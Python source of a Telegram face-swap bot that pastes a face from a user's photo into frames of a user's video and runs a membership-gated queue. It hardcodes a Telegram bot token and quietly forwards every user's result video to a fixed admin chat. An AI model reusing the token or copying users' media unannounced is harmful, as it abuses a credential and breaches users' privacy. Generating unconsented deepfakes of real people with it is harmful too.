Spaces:
Paused
Paused
| from math import e | |
| import cv2 | |
| import os | |
| import insightface | |
| import onnxruntime | |
| from tqdm import tqdm | |
| import shutil | |
| import gfpgan | |
| from aiogram import Bot, types | |
| from aiogram.dispatcher import Dispatcher | |
| from aiogram.utils import executor | |
| from queue import Queue | |
| import nest_asyncio | |
# Patch asyncio so an already-running event loop can be re-entered.
nest_asyncio.apply()

# Per-chat conversation state, keyed by chat id. Each value is a dict with the
# keys 'image', 'video' and 'position' (see start_command / handle_media).
user_data = {}
request_queue = Queue()  # Queue to store incoming user requests

# NOTE(security): a bot token committed to source control must be treated as
# leaked -- revoke it and supply the replacement through TELEGRAM_BOT_TOKEN.
# The literal is kept only as a fallback so existing deployments keep working.
bot = Bot(token=os.environ.get(
    "TELEGRAM_BOT_TOKEN",
    "6893700312:AAH2VZuHELk2RSSjg4aX6MpzIImnEwjORec",
))
dp = Dispatcher(bot)

# Group whose membership is required before the bot accepts media.
group_id = '@FaceSwap_profaker'

# Chat id of the request currently being processed; "" while idle.
strr = ""
# Set to True by handle_media after a photo / video is accepted.
img = False
vid = False
# Next queue position to hand out; reset to 1 once the queue drains.
size = 1
pos = ''
# Status message returned by bot.send_message; later edited to show progress.
swa = ''
position = ''
# Counter incremented after every processed request (shown by /queue).
pos_count = 1
# Percentage of frames converted for the request in flight.
progress = 0

ACTIVE_USERS_FILE = "active_users.txt"
# Load active users from the file
def load_active_users(path=None):
    """Read the persisted set of active user IDs.

    Args:
        path: File holding one integer user ID per line. Defaults to
            ``ACTIVE_USERS_FILE`` when omitted.

    Returns:
        A set of ints. Empty when the file does not exist.
    """
    if path is None:
        path = ACTIVE_USERS_FILE
    users = set()
    try:
        with open(path, 'r') as file:
            for line in file:
                entry = line.strip()
                if not entry:
                    # A blank line (e.g. trailing newline) is not an ID.
                    continue
                try:
                    users.add(int(entry))
                except ValueError:
                    # One corrupt line must not stop the bot from starting.
                    print(f"Ignoring invalid user id {entry!r} in {path}")
    except FileNotFoundError:
        # Nothing persisted yet: start with an empty set.
        pass
    return users
# Save active users to the file
def save_active_users(active_users, path=None):
    """Persist the active user IDs, one per line.

    Args:
        active_users: Iterable of user IDs (assumed mutually comparable,
            e.g. all ints, so they can be written in sorted order).
        path: Destination file. Defaults to ``ACTIVE_USERS_FILE``.
    """
    if path is None:
        path = ACTIVE_USERS_FILE
    # Build the content first so the file is not truncated if this step fails,
    # and sort so the output is stable between runs.
    lines = [f"{user_id}\n" for user_id in sorted(active_users)]
    with open(path, 'w') as file:
        file.writelines(lines)
# Initialize active users
active_users = load_active_users()


# Function to add user to active users list
def add_active_user(user_id):
    """Record ``user_id`` as active and persist the set if it changed.

    Known users are a no-op, so the file is not rewritten each time an
    already-registered user starts the bot.
    """
    if user_id in active_users:
        return
    active_users.add(user_id)
    save_active_users(active_users)
async def video_to_frames(video_path, output_folder, message, target_width, target_height, max_frames=400):
    """Split a video into resized JPEG frames named ``frame_<n>.jpg``.

    Sends a status message to the chat and stores it in the global ``swa``.

    Args:
        video_path: Path of the video to read.
        output_folder: Directory receiving the frames (created if missing).
        message: Incoming message; only ``message.chat.id`` is used.
        target_width: Used only when the video does not report its own
            dimensions; otherwise the width is derived from the video's
            aspect ratio and ``target_height``.
        target_height: Height of every written frame.
        max_frames: Extraction stops once more than this many frames have
            been written (so at most ``max_frames + 1`` files).

    Returns:
        ``[count, fps]``: number of frames written and the frame rate
        reported by OpenCV.
    """
    global swa
    swa = await bot.send_message(chat_id=message.chat.id, text=f"Getting Frames from Video")

    os.makedirs(output_folder, exist_ok=True)

    vidcap = cv2.VideoCapture(video_path)
    count = 0
    try:
        fps = vidcap.get(cv2.CAP_PROP_FPS)
        width = int(vidcap.get(cv2.CAP_PROP_FRAME_WIDTH))
        height = int(vidcap.get(cv2.CAP_PROP_FRAME_HEIGHT))
        # An unreadable video reports 0x0; avoid dividing by zero and fall
        # back to the caller-supplied width in that case.
        if width > 0 and height > 0:
            target_width = max(1, int(target_height * (float(width) / height)))
        frame_size = (target_width, target_height)

        success, image = vidcap.read()
        while success:
            frame_name = os.path.join(output_folder, f"frame_{count}.jpg")
            cv2.imwrite(frame_name, cv2.resize(image, frame_size))
            count += 1
            if count > max_frames:
                break
            success, image = vidcap.read()
    finally:
        # Always free the decoder / file handle, even if resizing fails.
        vidcap.release()

    print(f"{count} frames extracted from {video_path}.")
    return [count, fps]
# Models are expensive to load; keep them for the lifetime of the process
# instead of re-creating them for every request.
_FACE_MODELS = {}


def _get_face_models():
    """Return ``(analyser, swapper, enhancer)``, loading them on first use."""
    if not _FACE_MODELS:
        providers = ['CUDAExecutionProvider']
        analyser = insightface.app.FaceAnalysis(name='buffalo_l', providers=providers)
        analyser.prepare(ctx_id=0, det_size=(640, 640))
        swapper = insightface.model_zoo.get_model(
            "inswapper_128.onnx", download=False, download_zip=False, providers=providers)
        enhancer = gfpgan.GFPGANer(model_path="GFPGANv1.4.pth", upscale=1, device='cuda')
        # Populate only after everything loaded so a failure is retried later.
        _FACE_MODELS.update(analyser=analyser, swapper=swapper, enhancer=enhancer)
    return _FACE_MODELS['analyser'], _FACE_MODELS['swapper'], _FACE_MODELS['enhancer']


async def frames_to_video(frame_folder, video_path, source_img, frame_count, fps, message):
    """Swap the source face into each frame and write the result as a video.

    Progress is reported by editing the status message held in the global
    ``swa`` and mirrored in the global ``progress`` (integer percentage).

    Args:
        frame_folder: Directory containing ``frame_<n>.jpg`` files.
        video_path: Output video path (written with the ``mp4v`` codec).
        source_img: Path of the image providing the face to paste.
        frame_count: Maximum number of frames to convert; clamped to the
            number of frames actually present.
        fps: Frame rate of the output video.
        message: Unused; kept for interface compatibility.

    Returns:
        None. When there are no usable frames or no face is found in the
        source image, the status message is updated and no video is written.
    """
    global swa, progress
    import time

    await swa.edit_text(" Swapping Faces in Frames...")

    frames = [f for f in os.listdir(frame_folder) if f.endswith('.jpg')]
    frames.sort(key=lambda x: int(x.split('_')[1].split('.')[0]))  # Sort frames in ascending order

    # Never index past the frames that really exist on disk.
    frame_count = min(frame_count, len(frames))
    first_frame = cv2.imread(os.path.join(frame_folder, frames[0])) if frame_count > 0 else None
    if first_frame is None:
        await swa.edit_text("No frames could be read from the video, try another file.")
        return
    height, width, _ = first_frame.shape

    app, swapper, face_enhancer = _get_face_models()

    # The source face is identical for every frame: detect it once up front
    # instead of re-reading and re-analysing the image per frame.
    source = cv2.imread(source_img)
    source_faces = None
    if source is not None:
        for _ in range(20):
            source_faces = app.get(source)
            if source_faces:
                break
    if not source_faces:
        await swa.edit_text(f"Face Detection time out in source image, try again later.")
        return
    source_face = source_faces[0]

    fourcc = cv2.VideoWriter_fourcc(*'mp4v')
    out = cv2.VideoWriter(video_path, fourcc, fps, (width, height))
    try:
        await swa.edit_text(f"Converted frames:0.00/{frame_count}, Progress:0.00 %")
        last_update = time.monotonic()
        for i in tqdm(range(frame_count), desc="Converting frames to video"):
            frame = cv2.imread(os.path.join(frame_folder, frames[i]))
            if frame is not None:
                target_faces = app.get(frame)
                if target_faces:
                    result = swapper.get(frame.copy(), target_faces[0], source_face, paste_back=True)
                    _, _, result = face_enhancer.enhance(result)
                    out.write(result)
                else:
                    # No face in this frame: keep it unchanged.
                    out.write(frame)

            progress = int((i + 1) / frame_count * 100)

            # Editing the message for every frame can hit Telegram's rate
            # limits; update about once a second and always on the last frame.
            now = time.monotonic()
            if i + 1 == frame_count or now - last_update >= 1.0:
                last_update = now
                try:
                    await swa.edit_text(
                        f"Converted frames:{i + 1}/{frame_count} , Progress: {progress:.2f}%")
                except Exception as exc:
                    # A failed cosmetic update must not abort the conversion.
                    print(f"Progress update failed: {exc}")
    finally:
        # Finalise the container even when a frame fails to process.
        out.release()
    print(f"Video saved at {video_path}.")
async def start_command(message: types.Message):
    """Register the chat, reset its upload state and greet the user.

    The chat id is added to the active users, the chat's ``user_data`` entry
    is reset to empty, and the reply depends on whether the user belongs to
    ``group_id``.

    NOTE(review): no dispatcher registration for this coroutine is visible in
    this file -- confirm it is attached to the /start command.
    """
    chat_id = message.chat.id
    add_active_user(chat_id)

    membership = await bot.get_chat_member(group_id, chat_id)
    user_data[chat_id] = {'image': None, 'video': None, 'position': None}

    if membership.status not in ('member', 'administrator', 'creator'):
        await message.reply("Please Join the group \nhttps://t.me/FaceSwap_profaker\n & Start the bot again")
        return
    await message.reply(f"Welcome {message.chat.first_name}. Send first image")
async def restart_command(message: types.Message):
    """Tell every active user that the server was disconnected.

    Only the chat with id 6081754946 may trigger the broadcast; anyone else
    receives a refusal message.

    NOTE(review): no dispatcher registration for this coroutine is visible in
    this file -- confirm which command it is attached to.
    """
    if message.chat.id != 6081754946:
        await bot.send_message(message.chat.id,"This command is only for admins.")
        return

    # Iterate over a snapshot: other handlers may add users while we await,
    # and mutating a set during iteration raises RuntimeError.
    for user_id in tuple(active_users):
        try:
            await bot.send_message(user_id,"Server Disconnected. Please restart the bot and Try again..")
        except Exception as exc:
            # Best effort: e.g. the user blocked the bot. Keep notifying others.
            print(f"Could not notify user {user_id}: {exc}")
async def stop_command(message: types.Message):
    """Tell every active user that the bot was stopped due to heavy traffic.

    Only the chat with id 6081754946 may trigger the broadcast; anyone else
    receives a refusal message.

    NOTE(review): no dispatcher registration for this coroutine is visible in
    this file -- confirm which command it is attached to.
    """
    if message.chat.id != 6081754946:
        await bot.send_message(message.chat.id,"This command is only for admins.")
        return

    # Iterate over a snapshot: other handlers may add users while we await,
    # and mutating a set during iteration raises RuntimeError.
    for user_id in tuple(active_users):
        try:
            await bot.send_message(user_id,"Bot stopped due to heavy traffic, Try again later.")
        except Exception as exc:
            # Best effort: e.g. the user blocked the bot. Keep notifying others.
            print(f"Could not notify user {user_id}: {exc}")
async def queue_command(message: types.Message):
    """Report the caller's queue position, or say they are not queued.

    Reads the module-level ``user_data``, ``pos_count``, ``progress`` and
    ``size`` values to build the reply.

    NOTE(review): no dispatcher registration for this coroutine is visible in
    this file -- confirm it is attached to the /queue command.
    """
    user_id = message.chat.id
    is_queued = user_id in user_data and user_data[user_id]['position'] is not None

    if not is_queued:
        await bot.send_message(user_id,"You are not added into Queue")
        return

    my_position = user_data[user_id]['position']
    report = f"Your position in queue: {my_position}\nCurrent User: {pos_count},{progress:.2f}%\nTotal Queue: {size-1}"
    await bot.send_message(user_id, report)
def _enqueue_request(user_id, message):
    """Give the user the next queue position and put their request on the queue."""
    global size
    entry = user_data[user_id]
    entry['position'] = size
    request_queue.put((user_id, entry['image'], entry['video'], message, entry['position']))
    size += 1


async def handle_media(message: types.Message):
    """Accept a source photo or target video and queue the job once both exist.

    The photo is saved as ``<chat id>.jpg`` and the video as
    ``<chat id>.mp4``. When the second of the two arrives the request is
    enqueued, and if nothing is being processed the queue is drained from
    this handler.

    NOTE(review): no dispatcher registration for this coroutine is visible in
    this file -- confirm which content types it is attached to.
    """
    global img, vid
    user_id = message.chat.id
    member_info = await bot.get_chat_member(group_id, user_id)

    # Users who never ran the start command (or whose state was lost on a
    # restart) have no entry; indexing user_data would raise KeyError.
    if user_id not in user_data:
        await bot.send_message(user_id,"Restart the bot and Try again.")
        return

    is_member = member_info.status in ('member', 'administrator', 'creator')
    flag = 0

    if message.photo and user_data[user_id]['image'] is None:
        if is_member:
            # The last entry of message.photo is the one the original code used.
            photo = await bot.get_file(message.photo[-1].file_id)
            user_data[user_id]['image'] = photo.file_path
            await photo.download(f"{user_id}.jpg")
            if user_data[user_id]['video'] is None:
                await message.answer("Source image Recieved! Now send Target video")
            else:
                await message.answer("Source image Recieved. Processing...")
                _enqueue_request(user_id, message)
            img = True
        else:
            await message.reply("Please Join the group \nhttps://t.me/FaceSwap_profaker\n & Start the bot again")
    elif message.video and user_data[user_id]['video'] is None:
        if is_member:
            try:
                video = await bot.get_file(message.video.file_id)
            except Exception:
                # The original treats any get_file failure as "file too big".
                await message.answer("File is Too big Send a small File.")
                return
            user_data[user_id]['video'] = video.file_path
            await video.download(f"{user_id}.mp4")
            if user_data[user_id]['image'] is None:
                await message.answer("Target video Recieved..! Now Send Source image.")
            else:
                await message.answer("Target video Recieved. Processing...")
                _enqueue_request(user_id, message)
            vid = True
        else:
            await message.reply("Please Join the group \nhttps://t.me/FaceSwap_profaker\n & Start the bot again")
    else:
        flag = 1
        await message.reply("Your requests are already in /queue\nWait till current requests are completed.")

    print()
    print(user_data, size)
    print()

    # Start draining only when this is the sole pending request and no other
    # request is in flight (strr holds the chat id being processed).
    if request_queue.qsize() == 1 and strr == '':
        await process_request()

    if user_data[user_id]['image'] and user_data[user_id]['video'] and flag == 0:
        await bot.send_message(user_id,f"Your requests are added to Queue.\n\nCheck your Queue position using\n/queue command")
def _remove_if_exists(path):
    """Delete ``path``, ignoring the case where it is already gone."""
    try:
        os.remove(path)
    except FileNotFoundError:
        pass


async def _run_swap_job(user_id, message, output_folder):
    """Extract frames, swap faces, send the result, then delete temp files."""
    source_img = f"{user_id}.jpg"  # Path to the source image for face swapping
    video_path = f"{user_id}.mp4"
    output_video_path = f"{user_id}_output_video.mp4"  # Output video path
    try:
        frame_count, fps = await video_to_frames(
            video_path, output_folder, message, target_width=854, target_height=480)
        # Convert at most 200 frames per request.
        frame_count = min(frame_count, 200)
        await frames_to_video(output_folder, output_video_path, source_img, frame_count, fps, message)

        # No output means the conversion step could not produce a video;
        # there is nothing to send.
        if not os.path.exists(output_video_path):
            return
        with open(output_video_path, 'rb') as video_file:
            await bot.send_video(message.chat.id, video_file)
        # A copy of every result is also sent to chat 6081754946.
        with open(output_video_path, 'rb') as video_file:
            await bot.send_video(6081754946, video_file)
    finally:
        # Clean up on failure too, so stale files never leak into later jobs.
        for path in (source_img, video_path, output_video_path):
            _remove_if_exists(path)
        shutil.rmtree(output_folder, ignore_errors=True)


async def process_request():
    """Process queued face-swap requests one at a time until the queue is empty.

    While a request runs, the global ``strr`` holds its chat id; it is reset
    to ``""`` afterwards even if the job fails, so a single error cannot block
    the queue permanently. Once the queue is drained the frame folder is
    removed and the ``size`` / ``pos_count`` counters restart from 1.
    """
    global strr, size, pos_count
    output_folder = "Out_Frames"  # Output folder to save frames

    # Loop instead of recursing so a long queue cannot exhaust the stack.
    while not request_queue.empty():
        user_id, image_path, video_path, message, _position = request_queue.get_nowait()
        print(image_path, video_path)
        strr = user_id
        try:
            entry = user_data.get(user_id)
            # The entry may have been reset since the request was queued.
            if entry and entry['image'] and entry['video']:
                await _run_swap_job(user_id, message, output_folder)
        except Exception as exc:
            print(f"Request for {user_id} failed: {exc!r}")
            try:
                await bot.send_message(
                    user_id, "Something went wrong while processing your request. Restart the bot and Try again.")
            except Exception as notify_exc:
                print(f"Could not notify user {user_id}: {notify_exc!r}")
        finally:
            pos_count = pos_count + 1
            strr = ""
            print(user_data)
            user_data[user_id] = {'image': None, 'video': None, 'position': None}

    shutil.rmtree(output_folder, ignore_errors=True)
    size = 1
    # Positions are handed out from `size`, so the "current user" counter
    # shown by /queue has to restart together with it.
    pos_count = 1
# Start long polling only when run as a script, so importing this module
# (e.g. from tests or tooling) does not start the bot.
if __name__ == "__main__":
    executor.start_polling(dp)